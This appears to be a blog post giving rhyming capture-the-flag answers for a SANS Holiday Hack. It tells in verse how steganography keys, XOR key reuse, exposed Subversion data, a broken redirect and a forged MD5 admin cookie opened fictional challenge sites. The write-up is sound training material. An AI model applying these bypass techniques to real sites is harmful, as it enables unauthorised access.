Now that the submission deadline has passed, I can share my answers to the SANS Holiday Hack that I wrote about last month.
Since there are awards for both best technical answer and best creative answer, I chose to go with creative. I still have a lot to learn in my budding InfoSec career, so I assumed I’d have no shot at writing up the best technical explanation. As a father of two young children, I’ve read a ton of Christmas stories recently so it seemed like a no-brainer to try and structure my answers like the holiday fairy tale the challenge was based on.
The questions were:
- Where did you find the remainder of Snow Miser’s Zone 1 URL?
- What is the key you used with steghide to extract Snow Miser’s Zone 2 URL? Where did you find the key?
- On Snow Miser’s Zone 3 page, why is using the same key multiple times a bad idea?
- What was the coding error in Zone 4 of Heat Miser’s site that allowed you to find the URL for Zone 5?
- How did you manipulate the cookie to get to Zone 5 of Heat Miser’s Control System?
- Please briefly describe the process, steps, and tools you used to conquer each zone, including all of the flags hidden in the comments of each zone page.
My answers (I’ve omitted the flags from question 6):
Snow Miser was careless with social media, a textbook case for Wikipedia.
A public tweet, his desk was shown. But in the pic his cover’s blown.
“The URL’s private!”, He may think….
But it’s inverted in his drink.
He was a fan of 90s white-boy rap, (though music lovers knew it was crap)
“IceIceBaby!” was the secret key, but he carelessly left it plain to see.
Just look in the Jay Pee Gee’s properties
To defeat his steganography.
The URL for snow-zone four was encrypted with a simple XOR
But the miser’s mistake, as you can see, was reusing a single key
“Zone four’s old string!! ”, he must have cursed
Since the bitwise function can be reversed.
Heat Miser thinks he’s awfully sneaky, but his security model’s pretty leaky.
He thought zone four was locked down tight, but the redirect was not done right.
The location switch function wasn’t run until AFTER the page loading was done.
So anyone who inspects their traffic, can see the info in the packets.
A cookie protected the final site, much to a casual hacker’s delight
The label was clear, a UID. But how to guess the value correctly?
A ha! It’s just a simple hash, cracked as 1001 in a dash.
A common guess for the administrator…MD5 of 1 and see you later!
Christmas was in trouble again this year, but not from Martians or sickly reindeer
Santa was not quite feeling his best, he wanted to stay in and get some rest
But Mrs. Claus devised a way to ensure a normal Christmas Day.
It’s complicated to put it concisely, but there were two brothers not acting nicely.
They each intended to hack the other, both confident they were the smarter brother.
But now in trouble with their mama, there’s bound to be some Christmas drama.
So now I guess it’s up to me to get a present under every tree.
Hacking Snow Miser:
Zone zero, my journey had begun, seeking a clue for zone number one
Fortunately the address I need was right in snow miser’s twitter feed.
It seems that he carelessly acted, posting a picture that should have been redacted.
With the completed URL in tow, onward to zone one I go!
Here I found a little clue to break into zone number two.
The images on the page are the key…must be steganography!
To unlock the secret with Steghide, a password I must now provide,
Under the mat, look for the key…in this case, check the properties
The comments field, in plaintext, I find the words that I’ll use next
Message decoded, I’m in zone two, what now do I have to do?
Back to Twitter once again, Heat Miser is now my friend
Luckily he happened to find a phone image his brother left behind
With that in hand, it’s easy to see the address for Snow Zone number three.
Now Snow Miser sets the score to break into snow zone number four
The address is given, but it’s encrypted. Left a critical error, so the key could be lifted.
He showed a different text and the cipher produced, and then the same key he simply reused
Getting the key was hardly a chore, he did nothing more than a bitwise XOR.
Key in hand, the cipher decoded, zone number four was finally loaded.
The final zone was secured a bit wiser, I turned once more to my friend Heat Miser
He Tweeted a tip about a recent excursion, wherein Tim Medin exploits Subversion.
Snow Miser’s directories weren’t secured, and so his change database was quickly procured.
Following along with the directions from Tim, I got to the source code quick as the wind.
Now I could see how the zone had been locked, the hash generated was based off the clock.
Just set the right password at the right time, and suddenly zone five is totally mine.
Now I’ve achieved half my goal, I can disable the chillers at the North Pole
But to complete the task at hand, I’ll start turning the heat down in southern lands.
Hacking Heat Miser:
Now at the site of the hot-headed son, he gave out a clue to unlock heat zone one
It seems quite apparent that mister Heat Miser was having some trouble with Internet spiders
I just simply typed in robots dot text…can you guess what transpired next?
The address that I sought was there in plain sight! (and I thought that this hack might have taken all night)
From zone one to zone two didn’t get any harder, it seemed that Heat Miser was not getting smarter
True, in a comment the link wouldn’t show, but the HTML source still has it in tow
Right-click, show source…this security’s a joke! He could get hacked by a Jersey Shore jamoke.
The security problems seem to repeat, with another case of a careless tweet
Heat Miser’s screenshot brimmed with audacity, but he neglected to check on the window opacity.
Though it was blurry and borderline legible, I was able to tease out the right hexadecimal.
Now from zone three it was hardly a chore, since heat miser gives out the link to zone four.
His confidence shows with this info supplied, since a click on the link leads to “Access Denied”
He was mistaken to be quite so cocky, since his poor execution was defeated by proxy.
Loading up Fiddler, my traffic inspector, I found out that he was a bad redirector
The redirect function did not have an exit(), so I still got the data he thought he’d protected
The URL for the last zone was now out, I would surely save Christmas, I hadn’t a doubt.
Once again I saw Heat Miser’s page redirect me, unfortunately now he had done it correctly
Still looking at headers through Fiddler’s display, a cookie was set…that must be the way!
The value I saw was a UID string, but I hadn’t a clue what to do with the thing
Then…Inspiration! It hit like a flash. This length looks familiar, I think it’s a hash!
To an MD5 cracker I headed with glee, one thousand one was the decrypted UID.
I assumed that the admin ID would be one, I was moments away from my task being done!
Now with the hash I thought would work best, I went back to Fiddler and changed my request
I had saved Christmas! I knew it was true! It returned two hundred and not three oh two.
And so, dear reader you might have one last query. Who am I, the hacker who kept Christmas cheery?
I’ll give you a hint, though you still might not guess…I can often be seen in a red and white dress.
Did you guess who I am? It’s me, Mrs. Claus! I can see that the answer has given you pause.
See, the Misers were prone to dropping the ball, so I picked up my phone and made a quick call
I signed up for SANS training classes from home (they never have anything closer than Nome)
With vLive instruction I now had the tools to break into both sites and embarrass those fools.
So now as I help Santa load up his sack, “Merry Christmas to all, and to all a good hack!”